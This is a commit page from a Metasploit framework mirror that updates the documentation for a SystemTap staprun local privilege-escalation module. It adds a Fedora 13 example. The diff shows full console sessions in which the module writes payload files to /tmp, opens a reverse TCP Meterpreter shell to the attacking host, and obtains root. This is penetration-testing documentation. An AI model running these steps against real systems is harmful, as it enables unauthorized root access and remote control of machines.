infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #11759 docs update for systemtap

master
h00die 2019-04-19 13:42:49 -04:00
parent 5ef5904296 1749f0572d
commit cf9bda08ae
No known key found for this signature in database
GPG Key ID: C5A9D25D1457C971
1 changed files with 38 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md
View File

@ -31,10 +31,6 @@
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**STAPRUN_PATH**
Path to staprun executable (default: `/usr/bin/staprun`)
@ -46,15 +42,17 @@
## Scenarios
### Red Hat Enterprise Linux 5.5 (x64)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
@ -80,3 +78,37 @@
meterpreter >
```
### Fedora 13 (x86)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
[*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
Retrying, after attempted removal of module l0rDp93O8f (rc -1)
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : fedora13.localdomain
OS : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```